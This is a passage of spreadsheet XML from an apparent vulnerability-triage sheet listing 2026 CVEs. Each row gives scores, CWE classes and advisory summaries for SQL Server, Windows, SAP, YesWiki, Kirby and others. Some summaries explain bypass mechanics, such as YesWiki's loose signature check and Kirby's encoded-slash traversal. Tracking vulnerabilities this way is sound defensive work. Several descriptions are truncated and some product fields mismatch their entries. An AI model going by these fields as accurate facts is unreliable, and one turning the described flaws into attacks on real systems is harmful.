          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>Konga before 2.1.0 contains a privilege escalation vulnerability that allows low-privileged local attackers to execute arbitrary code by planting attacker-controlled OpenSSL configuration or library files in a hardcoded filesystem path absent from default installations. On Windows, the missing directory resides in a location writable by any authenticated local user, enabling attackers to create the directory and place malicious files that execute at the privilege level of the user or service account that launches Konga, facilitating privilege escalation.</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45221</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85656</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>log4j</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>An OS command injection issue in the log4j-cve-2021-44228-hotpatch package in Amazon Linux before 1.3-9 might allow a local user to execute arbitrary commands with root privileges via a Java process whose executable path contains embedded newline characters.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85656</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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00" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52767</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, HttpSignatureService::verifySignature() checks the result of PHP's openssl_verify() with a loose boolean negation - if (!openssl_verify(...)) { throw ... }. PHP's openssl_verify has four possible return values: 1, 0, -1, and "false". The -1 row is the bypass: PHP's truthiness rules make -1 a truthy value, so !(-1) === false, the throw is skipped, and the controller proceeds to processActivity(). Any condition that makes OpenSSL's EVP_VerifyFinal() return -1 triggers the bypass. The reachable consequence is the controller silently treats a failed verification as success and processes the attacker's payload. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52767</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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03" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75594</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. Prior to 4.9.5 and 5.5.2, depending on the release line, Kirby's media handler in src/Cms/Media.php allowed Kirby\Cms\Media::thumb() to append a path-bearing filename to a validated parent media directory. On nginx, PHP's built-in server, or Apache with AllowEncodedSlashes enabled, a remote attacker could submit encoded slash characters such as %2f in the filename and traverse outside the parent's media directory. Differences between responses for existing and nonexistent thumbnail configurations disclosed whether an arbitrary .json file existed, and a .json file containing a valid filename key could cause the referenced image to be returned and the job file to be deleted. The related file::version path in src/Filesystem/Asset.php also accepted ../ sequences outside the intended index root. This issue is fixed in versions 4.9.5 and 5.5.2.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75594</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
